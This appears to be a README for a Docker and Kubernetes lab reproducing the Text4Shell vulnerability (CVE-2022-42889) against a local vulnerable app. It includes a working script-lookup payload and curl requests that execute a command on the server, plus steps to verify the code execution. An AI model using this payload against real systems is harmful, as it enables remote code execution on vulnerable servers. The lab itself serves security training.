Text4Shell CVE-2022-42889
Docker Lab for CVE-2022-42889
You can either build the Docker image locally or pull the image from Docker Hub and run the container.
Clone the repo
git clone https://github.com/devenes/text4shell-cve-2022-42889.git
Build the Docker image locally
docker build --tag=text4shell .
Run the Docker container
docker run -d --rm -p 8080:8080 text4shell
Or pull the image from Docker Hub and run the container
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0
search
parameter:
Test the app by passing a string to the curl http://localhost/text4shell/attack?search=<anything>
- Attack can be performed by passing a string
${prefix:name}
where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
curl
:
Attack using curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
- You can also try using
dns
orurl
prefixes
Get the container id
docker container ls
Get into the container
docker exec -it <container_id> bash
Check if the RCE attack was successful
- You should see a file named
foo
created in the/tmp
directory:
ls /tmp/
You can stop the container by running the following command
docker container stop <container_id>
Kubernetes Lab for CVE-2022-42889
kubernetes
and follow the instructions in the README.md
file.
Change the directory to cd kubernetes
Create kind cluster
kind create cluster --config kind-config.yaml
Deploy the vulnerable app to the cluster
kubectl apply -f deployment.yaml
Create a service to expose the app
kubectl apply -f service.yaml
curl
Attack the vulnerable app using curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
kubectl get pods
Get the pod name using kubectl get pods
kubectl exec
Get into the pod using kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash
Check if the attack was successful
ls /tmp/ | grep foo
Udemy course here
You can find the detailed tutorial on myReferences: